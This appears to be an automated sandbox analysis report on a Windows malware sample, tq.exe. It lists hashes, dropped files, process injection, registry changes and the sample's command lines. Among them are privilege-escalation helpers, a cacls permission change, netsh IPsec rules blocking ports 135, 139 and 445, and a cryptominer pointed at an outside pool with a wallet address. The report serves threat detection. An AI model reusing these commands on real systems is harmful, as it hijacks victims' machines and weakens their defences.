Analysis
- max time kernel: 58s
- max time network: 149s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 07-05-2021 13:00
Static task: static1
Behavioral task: behavioral1
- Sample: tq.exe
- Resource: win7v20210410
Behavioral task: behavioral2
- Sample: tq.exe
- Resource: win10v20210408
General
- Target: tq.exe
- Size: 418KB
- MD5: e8450e61f061fd90d74507eb04845ecd
- SHA1: f344f20c57f9cb01ea3166f3404336da1519a832
- SHA256: 0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15
- SHA512: d4497d9c37812c9d0733ab1785e4592cabb1fd5861d8b102c8eb351f0c96b8f70be8f27ac2e817976b751cfb8fd25167376df412bde8f966ea3a195086dd1a91
Malware Config
Signatures
- Downloads MZ/PE file
- Executes dropped EXE (8 IoCs)
Processes (pid, process):
- 1608 MS19.exe
- 1916 MS20.exe
- 296 MSSQLH.exe
- 1016
- 808 RunDllExe.exe
- 944 RunDllExe.exe
- 1600 x64.exe
- 1928 wudfhosts.exe
- Registers new Print Monitor (2 TTPs)
- Sets DLL path for service in the registry (2 TTPs)
Processes (resource, yara_rule):
- \Users\Admin\AppData\Local\Temp\x64.exe | upx
- \Users\Admin\AppData\Local\Temp\x64.exe | upx
- C:\Users\Admin\AppData\Local\Temp\x64.exe | upx
- C:\Users\Admin\AppData\Local\Temp\x64.exe | upx
- C:\Windows\Cursors\wudfhosts.exe | upx
- C:\Windows\Cursors\WUDFhosts.exe | upx
- \Windows\Cursors\WUDFhosts.exe | upx
- Loads dropped DLL (10 IoCs)
Processes (pid, process):
- 2000 tq.exe
- 1168
- 2000 tq.exe
- 1960
- 2000 tq.exe
- 2000 tq.exe
- 296 MSSQLH.exe
- 296 MSSQLH.exe
- 1932 svchost.exe
- 1900 svchost.exe
- Drops file in System32 directory (2 IoCs)
Processes (description, ioc, process):
- File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Update[1].txt | svchost.exe
- File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | svchost.exe
- Suspicious use of SetThreadContext (3 IoCs)
Processes (description, pid process, target process):
- PID 944 set thread context of 560 | 944 RunDllExe.exe | svchost.exe
- PID 808 set thread context of 472 | 808 RunDllExe.exe | svchost.exe
- PID 1932 set thread context of 1900 | 1932 svchost.exe | svchost.exe
- Drops file in Windows directory (18 IoCs)
Processes (description, ioc, process):
- File created | C:\Windows\Cursors\WUDFhosts.exe | x64.exe
- File created | C:\Windows\MpMgSvc.dll | MSSQLH.exe
- File created | C:\Windows\Logs\RunDllExe_New.dll | RunDllExe.exe
- File opened for modification | C:\Windows\Logs\RunDllExe.dll | RunDllExe.exe
- File created | C:\Windows\Logs\RunDllExe_New | RunDllExe.exe
- File opened for modification | C:\Windows\Logs\RunDllExe | RunDllExe.exe
- File opened for modification | C:\Windows\Help\active_desktop_render.dll | svchost.exe
- File created | C:\Windows\Logs\Vers.txt | MSSQLH.exe
- File created | C:\Windows\Logs\RunDllExe_New.dll | RunDllExe.exe
- File opened for modification | C:\Windows\Logs\RunDllExe.dll | RunDllExe.exe
- File opened for modification | C:\Windows\Logs\RunDllExe | RunDllExe.exe
- File created | C:\Windows\Logs\RunDllExe_New | RunDllExe.exe
- File created | C:\Windows\Help\active_desktop_render.dll | x64.exe
- File created | C:\Windows\Help\active_desktop_render_New.dll | svchost.exe
- File created | C:\Windows\Logs\RunDllExe.exe | MSSQLH.exe
- File created | C:\Windows\Logs\RunDllExe | MSSQLH.exe
- File created | C:\Windows\Logs\RunDllExe.dll | MSSQLH.exe
- File opened for modification | C:\Windows\Cursors\WUDFhosts.exe | x64.exe
- Modifies data under HKEY_USERS (24 IoCs)
Processes (description, ioc, process):
- Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | svchost.exe
- Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | svchost.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionReason = "1" | svchost.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1" | svchost.exe
- Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = e08d1b844043d701 | svchost.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0" | svchost.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | svchost.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | svchost.exe
- Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a070023000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | svchost.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32} | svchost.exe
- Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadNetworkName = "Network" | svchost.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77 | svchost.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecision = "0" | svchost.exe
- Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" | svchost.exe
- Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | svchost.exe
- Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | svchost.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | svchost.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | svchost.exe
- Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" | svchost.exe
- Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionTime = e08d1b844043d701 | svchost.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | svchost.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | svchost.exe
- Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | svchost.exe
- Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\32-e2-17-db-d2-77 | svchost.exe
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes (pid, process):
- 296 MSSQLH.exe
- 1900 svchost.exe
- 1900 svchost.exe
- 1900 svchost.exe
- 1900 svchost.exe
- 1900 svchost.exe
- Suspicious use of AdjustPrivilegeToken (34 IoCs)
Processes (description, pid, process):
- Token: SeImpersonatePrivilege | 1916 | MS20.exe
- Token: SeRestorePrivilege | 296 | MSSQLH.exe
- Token: SeBackupPrivilege | 296 | MSSQLH.exe
- Token: SeSecurityPrivilege | 296 | MSSQLH.exe
- Token: SeTakeOwnershipPrivilege | 296 | MSSQLH.exe
  (the preceding four-token sequence for 296 MSSQLH.exe is recorded 7 times in total, 28 rows)
- Token: SeRestorePrivilege | 1900 | svchost.exe
- Token: SeBackupPrivilege | 1900 | svchost.exe
- Token: SeSecurityPrivilege | 1900 | svchost.exe
- Token: SeTakeOwnershipPrivilege | 1900 | svchost.exe
- Token: SeLockMemoryPrivilege | 1928 | wudfhosts.exe
- Suspicious use of SetWindowsHookEx (8 IoCs)
Processes (pid, process):
- 2000 tq.exe
- 296 MSSQLH.exe
- 808 RunDllExe.exe
- 944 RunDllExe.exe
- 1600 x64.exe
- 1932 svchost.exe
- 1900 svchost.exe
- 1900 svchost.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
Processes (description, pid process, target process; consecutive identical rows collapsed with their count):
- PID 2000 wrote to memory of 1608 | 2000 tq.exe | MS19.exe (4 rows)
- PID 2000 wrote to memory of 1916 | 2000 tq.exe | MS20.exe (4 rows)
- PID 2000 wrote to memory of 296 | 2000 tq.exe | MSSQLH.exe (4 rows)
- PID 808 wrote to memory of 472 | 808 RunDllExe.exe | svchost.exe (6 rows)
- PID 944 wrote to memory of 560 | 944 RunDllExe.exe | svchost.exe (6 rows)
- PID 296 wrote to memory of 436 | 296 MSSQLH.exe | cacls.exe (4 rows)
- PID 944 wrote to memory of 560 | 944 RunDllExe.exe | svchost.exe (1 row)
- PID 808 wrote to memory of 472 | 808 RunDllExe.exe | svchost.exe (3 rows)
- PID 944 wrote to memory of 560 | 944 RunDllExe.exe | svchost.exe (3 rows)
- PID 808 wrote to memory of 472 | 808 RunDllExe.exe | svchost.exe (1 row)
- PID 296 wrote to memory of 1600 | 296 MSSQLH.exe | x64.exe (4 rows)
- PID 1600 wrote to memory of 572 | 1600 x64.exe | netsh.exe (4 rows)
- PID 1600 wrote to memory of 1064 | 1600 x64.exe | netsh.exe (4 rows)
- PID 1600 wrote to memory of 808 | 1600 x64.exe | netsh.exe (4 rows)
- PID 1600 wrote to memory of 1452 | 1600 x64.exe | netsh.exe (4 rows)
- PID 1600 wrote to memory of 1396 | 1600 x64.exe | netsh.exe (4 rows)
- PID 1600 wrote to memory of 1624 | 1600 x64.exe | netsh.exe (4 rows)
Processes (image path, command line, tree depth; children indented under their parent)
- C:\Users\Admin\AppData\Local\Temp\tq.exe (depth 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\tq.exe"
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\MS19.exe (depth 2)
    Command line: C:\Users\Admin\AppData\Local\Temp\MS19.exe -l 6666 -p C:\ProgramData\MSSQLH.exe -t *
    - Executes dropped EXE
  - C:\Users\Admin\AppData\Local\Temp\MS20.exe (depth 2)
    Command line: C:\Users\Admin\AppData\Local\Temp\MS20.exe -c C:\ProgramData\MSSQLH.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe (depth 2)
    Command line: C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cacls.exe (depth 3)
      Command line: cacls C:\Windows\Fonts\*.exe /e /d system
    - C:\Users\Admin\AppData\Local\Temp\x64.exe (depth 3)
      Command line: x64.exe
      - Executes dropped EXE
      - Drops file in Windows directory
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\netsh.exe (depth 4)
        Command line: netsh ipsec static add policy name=Block
      - C:\Windows\SysWOW64\netsh.exe (depth 4)
        Command line: netsh ipsec static add filterlist name=Filter1
      - C:\Windows\SysWOW64\netsh.exe (depth 4)
        Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
      - C:\Windows\SysWOW64\netsh.exe (depth 4)
        Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
      - C:\Windows\SysWOW64\netsh.exe (depth 4)
        Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
      - C:\Windows\SysWOW64\netsh.exe (depth 4)
        Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
      - C:\Windows\SysWOW64\netsh.exe (depth 4)
        Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
      - C:\Windows\SysWOW64\netsh.exe (depth 4)
        Command line: netsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
      - C:\Windows\SysWOW64\netsh.exe (depth 4)
        Command line: netsh ipsec static add filteraction name=FilteraAtion1 action=block
      - C:\Windows\SysWOW64\netsh.exe (depth 4)
        Command line: netsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion1
      - C:\Windows\SysWOW64\netsh.exe (depth 4)
        Command line: netsh ipsec static set policy name=Block assign=y
      - C:\Windows\SysWOW64\cmd.exe (depth 4)
        Command line: cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\x64.exe"
- C:\Windows\Logs\RunDllExe.exe (depth 1)
  Command line: C:\Windows\Logs\RunDllExe.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\svchost.exe (depth 2)
    Command line: C:\Windows\system32\svchost.exe
- C:\Windows\Logs\RunDllExe.exe (depth 1)
  Command line: C:\Windows\Logs\RunDllExe.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\svchost.exe (depth 2)
    Command line: C:\Windows\system32\svchost.exe
- C:\Windows\SysWOW64\svchost.exe (depth 1)
  Command line: C:\Windows\SysWOW64\svchost.exe -k GraphicsPerf_SvcsGroup
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of SetWindowsHookEx
  - C:\Windows\SysWOW64\svchost.exe (depth 2)
    Command line: C:\Windows\system32\svchost.exe
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - C:\Windows\Cursors\wudfhosts.exe (depth 3)
      Command line: C:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\MS19.exe
  MD5: af43611695488fcabec428adc17c47ce
  SHA1: 62c98fbc6e57317662369ca7a6bf249ba61e3ba9
  SHA256: 33a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61
  SHA512: a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778
- C:\Users\Admin\AppData\Local\Temp\MS20.exe
  MD5: 262fa5258c0bbd68221eed7226c58cd3
  SHA1: 0d8f0d3054f9b7c315bb9dc904258c755c39e379
  SHA256: b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933
  SHA512: a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55
- C:\Users\Admin\AppData\Local\Temp\MSSQLH.exe
  MD5: 4f824985f3aa38c89d6ce76e87f3f1c9
  SHA1: 8f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5
  SHA256: dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4
  SHA512: 1cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3
- C:\Users\Admin\AppData\Local\Temp\x64.exe
  MD5: 1fc1c860e86a8fbc2021d2567d62f703
  SHA1: 42ea2c9f4548614574dff36e019ae1cbc68b54e3
  SHA256: 76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
  SHA512: fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
- C:\Windows\Cursors\WUDFhosts.exe
  MD5: 4a72e30c0a582b082030adfd8345014f
  SHA1: 2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
  SHA256: e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
  SHA512: 8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
- C:\Windows\Cursors\wudfhosts.exe
  MD5: 4a72e30c0a582b082030adfd8345014f
  SHA1: 2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
  SHA256: e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
  SHA512: 8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
- C:\Windows\Logs\RunDllExe
  MD5: 72e85a6a9f4a9eaa4a5237095385676c
  SHA1: 61fc4204ce09d3c4827ba6647fe88cf0701164ff
  SHA256: 73f868b22ca348ce3806f51c48c1f216b03dbcc0266e79958f75d73648b1ae93
  SHA512: bdf83c534c3f9b6167eb54de252bd8d58ed858448afa17f7fe25d6f8b7e0aa58a4baffed59f9211c9bde93c8aaa051eb79bad8311e972a473b5ce9906ba33319
- C:\Windows\Logs\RunDllExe.dll
  MD5: 98a5b45bf5c2341c8e530785c27c0219
  SHA1: 0148cfd9cc24cc5bd3ec8d17387d982cb83eb992
  SHA256: 3335acf02f6cab32a7b4d18517b33412d49b6ad29f167a58561e6711645aade2
  SHA512: 9e0618a01864d032beb60f54f9ae9e2258051f743f28197c33732fc517871f6dcca532e172f7bee62c1db7de5ea6fa8984b933afd878b79eda95870d9daab3d7
- C:\Windows\Logs\RunDllExe.dll
  MD5: e91fbd6fe9e6794de7c1552adad7edbc
  SHA1: b49b7136945978800948b3f9cbe208a5b80020a8
  SHA256: 2cf78dc7d2588d7874dee8a0919ca2d3aab8ac8e54664a0a2c188e099687a33a
  SHA512: 84a6d9df7e4accd3c14650174953fe3a5b5de810d444a31a442a9236486785d492ea5ec0151e63e359ee5c2718243003d7b92a8b9f2544b6bd7cd18ee2f6accc
- C:\Windows\Logs\RunDllExe.exe
  MD5: 645564cf1c80e047a6e90ac0f2d6a6b7
  SHA1: 35e4b5e065b90fe5b1713e5a4645875f023b6a18
  SHA256: 6f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9
  SHA512: e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21
- \??\c:\windows\help\active_desktop_render.dll
  MD5: 14e2b194b652d4fd912404775a6ae898
  SHA1: e93f529bb61e12c41426cb2b86176bf0af387c09
  SHA256: 24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
  SHA512: b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6
- \Users\Admin\AppData\Local\Temp\MS19.exe
  MD5: af43611695488fcabec428adc17c47ce
  SHA1: 62c98fbc6e57317662369ca7a6bf249ba61e3ba9
  SHA256: 33a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61
  SHA512: a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778
- \Users\Admin\AppData\Local\Temp\MS20.exe
  MD5: 262fa5258c0bbd68221eed7226c58cd3
  SHA1: 0d8f0d3054f9b7c315bb9dc904258c755c39e379
  SHA256: b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933
  SHA512: a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55
- \Users\Admin\AppData\Local\Temp\MSSQLH.exe
  MD5: 4f824985f3aa38c89d6ce76e87f3f1c9
  SHA1: 8f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5
  SHA256: dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4
  SHA512: 1cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3
- \Users\Admin\AppData\Local\Temp\x64.exe
  MD5: 1fc1c860e86a8fbc2021d2567d62f703
  SHA1: 42ea2c9f4548614574dff36e019ae1cbc68b54e3
  SHA256: 76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
  SHA512: fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
- \Windows\Cursors\WUDFhosts.exe
  MD5: 4a72e30c0a582b082030adfd8345014f
  SHA1: 2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
  SHA256: e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
  SHA512: 8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
- \Windows\Help\active_desktop_render.dll
  MD5: 14e2b194b652d4fd912404775a6ae898
  SHA1: e93f529bb61e12c41426cb2b86176bf0af387c09
  SHA256: 24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
  SHA512: b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6
- \Windows\Logs\RunDllExe.dll
  MD5: c02d9300deea8aaa42bf5e9c56ddcf29
  SHA1: 4c547bab0a92ba6fe77a8bfcef56faf5f1a0ad89
  SHA256: 54dd6ca2fab1eab858fa8d06fa095a943d6d1ff601c71a4c6af5e9061019f9d5
  SHA512: c2537d3bf63bf67ac0e844fc65285bcd444896201fd14add9bef7bab054eb93269248ecfa752268e3f692bb8ea3bc8d861e40f4ba5f63b5428f8f75a204315e1
- memory/296-69-0x0000000000000000-mapping.dmp
- memory/296-71-0x00000000765F1000-0x00000000765F3000-memory.dmp (Filesize 8KB)
- memory/436-79-0x0000000000000000-mapping.dmp
- memory/472-77-0x0000000000400000-0x0000000000409000-memory.dmp (Filesize 36KB)
- memory/472-82-0x0000000000400000-0x0000000000409000-memory.dmp (Filesize 36KB)
- memory/472-87-0x00000000004054EC-mapping.dmp
- memory/472-121-0x0000000000000000-mapping.dmp
- memory/560-80-0x0000000000400000-0x0000000000409000-memory.dmp (Filesize 36KB)
- memory/560-91-0x0000000000400000-0x0000000000409000-memory.dmp (Filesize 36KB)
- memory/560-86-0x00000000004054EC-mapping.dmp
- memory/572-101-0x0000000000000000-mapping.dmp
- memory/808-105-0x0000000000000000-mapping.dmp
- memory/968-117-0x0000000000000000-mapping.dmp
- memory/1064-103-0x0000000000000000-mapping.dmp
- memory/1396-109-0x0000000000000000-mapping.dmp
- memory/1452-107-0x0000000000000000-mapping.dmp
- memory/1460-113-0x0000000000000000-mapping.dmp
- memory/1600-98-0x0000000000000000-mapping.dmp
- memory/1608-60-0x0000000000000000-mapping.dmp
- memory/1624-111-0x0000000000000000-mapping.dmp
- memory/1900-129-0x0000000010000000-0x000000001010C000-memory.dmp (Filesize 1.0MB)
- memory/1900-128-0x0000000010000000-0x000000001010C000-memory.dmp (Filesize 1.0MB)
- memory/1900-130-0x0000000010000000-0x000000001010C000-memory.dmp (Filesize 1.0MB)
- memory/1900-131-0x0000000010000000-0x000000001010C000-memory.dmp (Filesize 1.0MB)
- memory/1900-133-0x0000000010072B6D-mapping.dmp
- memory/1900-135-0x0000000010000000-0x000000001010C000-memory.dmp (Filesize 1.0MB)
- memory/1904-115-0x0000000000000000-mapping.dmp
- memory/1916-64-0x0000000000000000-mapping.dmp
- memory/1928-138-0x0000000000000000-mapping.dmp
- memory/1928-140-0x00000000000F0000-0x0000000000100000-memory.dmp (Filesize 64KB)
- memory/1928-141-0x0000000000130000-0x0000000000140000-memory.dmp (Filesize 64KB)
- memory/1928-142-0x0000000000140000-0x0000000000150000-memory.dmp (Filesize 64KB)
- memory/1928-143-0x0000000000150000-0x0000000000160000-memory.dmp (Filesize 64KB)
- memory/1952-119-0x0000000000000000-mapping.dmp
- memory/2016-126-0x0000000000000000-mapping.dmp